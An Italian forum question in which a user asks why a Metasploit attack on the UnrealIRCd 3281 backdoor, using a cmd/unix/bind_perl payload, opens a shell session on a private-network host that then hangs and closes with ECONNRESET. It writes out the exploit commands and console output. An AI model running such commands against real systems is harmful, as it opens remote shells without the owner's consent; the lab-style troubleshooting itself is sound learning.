Sto cercando di usare Metasploit nella backdoor di Unreal IRCD 3281. Ho provato con diversi tipi di payload ma il programma si blocca sull'ultima riga:
msf exploit(unreal_ircd_3281_backdoor) > set payload cmd/unix/bind_perl
payload => cmd/unix/bind_perl
msf exploit(unreal_ircd_3281_backdoor) > exploit
[*] Started bind handler
[*] Connected to 10.0.1.50:6667...
[*] Command shell session 1 opened (10.0.10.3:43301 -> 10.0.1.50:4444) at 2015-11-27 00:11:32 +0100
[*] Sending backdoor command...
E dopo questo non ho mai ricevuto il prompt indietro. Perché succede? Mi sembra di avere una sessione e dovrebbe funzionare, ma poi non succede nulla.
Modifica
Se aspetto un paio di minuti, ottengo questo:
[*] 10.0.1.50 - Command shell session 2 closed. Reason: Died from Errno::ECONNRESET
msf exploit(unreal_ircd_3281_backdoor) >
Ma non ho mai avuto l'opportunità di scrivere qualcosa nella console prima che ciò accada, cosa c'è che non va?